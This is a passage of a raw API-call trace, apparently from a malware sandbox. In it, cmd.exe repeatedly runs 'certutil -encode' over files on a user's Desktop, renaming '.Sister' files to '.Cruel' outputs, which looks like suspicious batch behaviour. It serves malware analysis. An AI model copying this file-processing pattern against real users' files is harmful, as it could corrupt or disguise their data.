(_String1="certutil", _String2="ENDLOCAL") returned -2 [0215.699] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0215.699] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0215.699] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0215.699] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0215.699] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0215.699] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0215.699] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0215.699] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0215.699] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0215.699] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0215.699] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0215.699] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0215.699] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0215.699] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0215.699] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0215.699] ??_V@YAXPEAX@Z () returned 0x1 [0215.699] GetProcessHeap () returned 0x21ed8c70000 [0215.700] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8ca7080 [0215.700] GetProcessHeap () returned 0x21ed8c70000 [0215.700] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x96) returned 0x21ed8d65930 [0215.700] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0215.700] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0215.700] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0215.700] GetProcessHeap () returned 0x21ed8c70000 [0215.700] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8cc96e0 [0215.704] SetErrorMode (uMode=0x0) returned 0x0 [0215.704] SetErrorMode (uMode=0x1) returned 0x0 [0215.704] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8cc96f0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0215.704] SetErrorMode (uMode=0x0) returned 0x1 [0215.705] GetProcessHeap () returned 0x21ed8c70000 [0215.705] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc96e0, Size=0x52) returned 0x21ed8cc96e0 [0215.705] GetProcessHeap () returned 0x21ed8c70000 [0215.705] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc96e0) returned 0x52 [0215.705] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0215.705] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0215.705] GetProcessHeap () returned 0x21ed8c70000 [0215.705] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d64fa0 [0215.705] GetProcessHeap () returned 0x21ed8c70000 [0215.705] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d66490 [0215.705] GetProcessHeap () returned 0x21ed8c70000 [0215.705] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66490, Size=0x1be) returned 0x21ed8d66490 [0215.705] GetProcessHeap () returned 0x21ed8c70000 [0215.705] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66490) returned 0x1be [0215.705] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0215.705] GetProcessHeap () returned 0x21ed8c70000 [0215.705] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c95de0 [0215.705] GetProcessHeap () returned 0x21ed8c70000 [0215.705] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95de0, Size=0x7e) returned 0x21ed8c95de0 [0215.706] GetProcessHeap () returned 0x21ed8c70000 [0215.706] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95de0) returned 0x7e [0215.706] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.706] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0215.706] GetLastError () returned 0x2 [0215.706] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.706] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0215.707] GetLastError () returned 0x2 [0215.707] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.707] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cb80 [0215.707] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0215.707] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0215.707] GetLastError () returned 0x2 [0215.707] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d000 [0215.707] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0215.708] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0215.708] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0215.708] ??_V@YAXPEAX@Z () returned 0x1 [0215.708] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0215.777] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0215.777] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0215.777] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0215.778] GetProcessHeap () returned 0x21ed8c70000 [0215.778] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45d70 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.778] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.779] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.779] GetProcessHeap () returned 0x21ed8c70000 [0215.779] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d70) returned 1 [0215.779] GetProcessHeap () returned 0x21ed8c70000 [0215.779] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95640 [0215.780] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0215.780] _get_osfhandle (_FileHandle=1) returned 0x50 [0215.780] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0215.888] _get_osfhandle (_FileHandle=0) returned 0x4c [0215.888] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0215.958] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"45AyVVfixDb.avi.Sister\" \"45AyVVfixDb.avi.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"45AyVVfixDb.avi.Sister\" \"45AyVVfixDb.avi.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"45AyVVfixDb.avi.Sister\" \"45AyVVfixDb.avi.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xcf8, dwThreadId=0xd40)) returned 1 [0215.970] CloseHandle (hObject=0xa4) returned 1 [0215.970] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0215.970] GetProcessHeap () returned 0x21ed8c70000 [0215.970] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0215.970] GetEnvironmentStringsW () returned 0x21ed9980080* [0215.970] GetProcessHeap () returned 0x21ed8c70000 [0215.970] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0215.970] FreeEnvironmentStringsA (penv="=") returned 1 [0215.970] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0217.938] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0217.938] CloseHandle (hObject=0xa8) returned 1 [0217.938] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0217.938] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0217.938] GetProcessHeap () returned 0x21ed8c70000 [0217.938] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0217.939] GetEnvironmentStringsW () returned 0x21ed9980080* [0217.939] GetProcessHeap () returned 0x21ed8c70000 [0217.939] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0217.939] FreeEnvironmentStringsA (penv="=") returned 1 [0217.939] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0217.939] GetProcessHeap () returned 0x21ed8c70000 [0217.939] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0217.939] GetEnvironmentStringsW () returned 0x21ed9980080* [0217.939] GetProcessHeap () returned 0x21ed8c70000 [0217.939] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0217.939] FreeEnvironmentStringsA (penv="=") returned 1 [0217.939] GetProcessHeap () returned 0x21ed8c70000 [0217.939] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95640) returned 1 [0217.939] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0217.939] ??_V@YAXPEAX@Z () returned 0x1 [0217.939] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x391bc3b0, ftCreationTime.dwHighDateTime=0x1d5ee21, ftLastAccessTime.dwLowDateTime=0xbb227000, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0xbb227000, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1395e, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="6uAkPGvRw81680a_RZ.m4a.Sister", cAlternateFileName="")) returned 1 [0217.940] GetProcessHeap () returned 0x21ed8c70000 [0217.940] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980da0, Size=0x1c2) returned 0x21ed9980da0 [0217.940] GetProcessHeap () returned 0x21ed8c70000 [0217.940] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980da0) returned 0x1c2 [0217.940] GetProcessHeap () returned 0x21ed8c70000 [0217.940] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937aa20 [0217.940] GetProcessHeap () returned 0x21ed8c70000 [0217.940] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937aa20, Size=0x58) returned 0x21ed937aa20 [0217.940] GetProcessHeap () returned 0x21ed8c70000 [0217.940] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937aa20) returned 0x58 [0217.940] GetProcessHeap () returned 0x21ed8c70000 [0217.940] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937aa90 [0217.940] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0217.940] GetProcessHeap () returned 0x21ed8c70000 [0217.940] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cd00 [0217.941] ??_V@YAXPEAX@Z () returned 0x1 [0217.941] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0217.941] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ce20 [0217.941] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0217.941] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d000 [0217.942] FindClose (in: hFindFile=0x21ed8c7d000 | out: hFindFile=0x21ed8c7d000) returned 1 [0217.942] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xac24420a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xac24420a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0217.942] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0217.942] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\6uAkPGvRw81680a_RZ.m4a.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x391bc3b0, ftCreationTime.dwHighDateTime=0x1d5ee21, ftLastAccessTime.dwLowDateTime=0xbb227000, ftLastAccessTime.dwHighDateTime=0x1d5e1ee, ftLastWriteTime.dwLowDateTime=0xbb227000, ftLastWriteTime.dwHighDateTime=0x1d5e1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1395e, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="6uAkPGvRw81680a_RZ.m4a.Sister", cAlternateFileName="6UAKPG~1.SIS")) returned 0x21ed8c7cee0 [0217.942] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0217.942] _wcsnicmp (_String1="6UAKPG~1.SIS", _String2="6uAkPGvRw81680a_RZ.m4a.Sister", _MaxCount=0x1d) returned 8 [0217.943] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0217.943] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0217.943] GetProcessHeap () returned 0x21ed8c70000 [0217.943] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7c110 [0217.943] ??_V@YAXPEAX@Z () returned 0x1 [0217.943] ??_V@YAXPEAX@Z () returned 0x1 [0217.943] GetProcessHeap () returned 0x21ed8c70000 [0217.943] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937aa90, Size=0x250) returned 0x21ed937aa90 [0217.943] GetProcessHeap () returned 0x21ed8c70000 [0217.943] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937aa90) returned 0x250 [0217.943] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0217.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0217.943] GetFileType (hFile=0x50) returned 0x2 [0217.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0217.943] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0218.140] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.140] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0218.193] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0218.193] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0218.193] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0218.193] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0218.193] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.193] GetFileType (hFile=0x50) returned 0x2 [0218.193] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0218.193] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0218.390] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.390] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0218.509] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.509] GetFileType (hFile=0x50) returned 0x2 [0218.509] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0218.509] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0218.605] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.605] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937aa30*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed937aa30*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0218.689] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"6uAkPGvRw81680a_RZ.m4a.Sister\" \"6uAkPGvRw81680a_RZ.m4a.Cruel\" ") returned 72 [0218.689] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.689] GetFileType (hFile=0x50) returned 0x2 [0218.689] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0218.689] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0218.773] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.773] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x48) returned 1 [0218.856] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0218.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.856] GetFileType (hFile=0x50) returned 0x2 [0218.856] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0218.856] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0218.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.928] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0219.001] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0219.072] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0219.073] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0219.073] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0219.073] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0219.073] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0219.073] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0219.073] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0219.073] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0219.073] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0219.073] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0219.073] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 